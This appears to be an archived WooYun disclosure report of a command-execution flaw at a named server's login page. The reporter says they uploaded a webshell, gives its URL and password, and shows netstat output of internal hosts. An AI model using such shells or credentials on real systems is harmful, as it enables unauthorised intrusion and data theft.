乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
地址http://118.195.133.196:9990/sdb2b/login.action存在命令执行漏洞
传了个马http://118.195.133.196:9990/sdb2b/1.jsp密码123netstat -ano
Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 724 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 436 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1408 TCP 0.0.0.0:2030 0.0.0.0:0 LISTENING 1520 TCP 0.0.0.0:5631 0.0.0.0:0 LISTENING 1280 TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 1820 TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 1820 TCP 0.0.0.0:14474 0.0.0.0:0 LISTENING 2496 TCP 0.0.0.0:44737 0.0.0.0:0 LISTENING 2040 TCP 127.0.0.1:1027 0.0.0.0:0 LISTENING 2688 TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING 1380 TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 1820 TCP 192.168.88.68:139 0.0.0.0:0 LISTENING 4 TCP 192.168.88.68:1040 192.168.88.46:1521 ESTABLISHED 1820 TCP 192.168.88.68:1046 192.168.88.46:1521 ESTABLISHED 1820 TCP 192.168.88.68:3097 192.168.88.46:1521 ESTABLISHED 1820 TCP 192.168.88.68:3162 192.168.88.46:1521 ESTABLISHED 1820 TCP 192.168.88.68:3197 192.168.88.46:1521 ESTABLISHED 1820 TCP 192.168.88.68:3207 192.168.88.107:139 TIME_WAIT 0 TCP 192.168.88.68:3208 192.168.88.107:139 TIME_WAIT 0 TCP 192.168.88.68:8080 113.106.87.249:3186 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3188 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3192 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3193 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3194 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3195 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 113.106.87.249:3196 FIN_WAIT_2 1820 TCP 192.168.88.68:8080 171.111.45.251:22235 TIME_WAIT 0 TCP 192.168.88.68:8080 171.111.45.251:22315 ESTABLISHED 1820 TCP 192.168.88.68:8080 171.111.45.251:22540 ESTABLISHED 1820 UDP 0.0.0.0:445 *:* 4 UDP 0.0.0.0:500 *:* 436 UDP 0.0.0.0:1434 *:* 1408 UDP 0.0.0.0:4500 *:* 436 UDP 0.0.0.0:5632 *:* 1280 UDP 127.0.0.1:123 *:* 832 UDP 127.0.0.1:1034 *:* 832 UDP 192.168.88.68:123 *:* 832 UDP 192.168.88.68:137 *:* 4 UDP 192.168.88.68:138 *:* 4
呵呵
加强安全意识
危害等级:中
漏洞Rank:8
确认时间:2015-07-13 15:04
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。.
暂无